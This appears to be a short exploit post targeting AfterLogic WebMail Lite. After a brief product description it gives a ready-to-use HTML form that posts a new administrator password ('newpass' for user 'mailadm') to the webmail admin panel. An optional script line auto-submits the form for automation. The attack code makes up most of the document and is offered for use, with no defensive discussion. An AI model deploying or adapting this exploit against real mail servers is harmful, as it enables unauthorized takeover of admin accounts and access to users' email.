AfterLogic WebMail Lite Authentication Bypass

`AfterLogic WebMail Lite is a free web-based IMAP and SMTP email-client  
with Ajax interface. AfterLogic WebMail Lite is available for both PHP  
and ASP.NET platforms.  
  
The version of AfterLogic WebMail Lite that is written in PHP is free  
and open-source software subject to the terms of the Affero General  
Public License (AGPL) version 3. The version written in ASP.NET is  
proprietary software available as freeware.  
  
And is deployed over 5/20 mailsevers, quite popular.  
  
This exploit attempts to exploit the admin and get(s) us a new  
password to the admin panel which should be located at  
site.com/mail/adminpanel/index.php  
  
<h2>After Logic Mail - Change Admin Password Exploit</h2>  
<form action="http://localhost/webmail/adminpanel/index.php?submit"  
method="POST" id="security_form">  
<input type="hidden" name="form_id" value="security">  
<input type="text" class="wm_input" name="txtUserName"  
id="txtUserName" value="mailadm" size="30" />  
<input type="password" class="wm_input" name="txtNewPassword"  
id="txtNewPassword" value="newpass" size="30" />  
<input type="password" class="wm_input" name="txtConfirmNewPassword"  
id="txtConfirmNewPassword" value="newpass" size="30" />  
<input type="submit" name="submit_btn" value="Save" id="automate">  
</form>  
<script>  
//uncomment the second line for automation  
//document.getElementById('automate').click();  
</script>  
`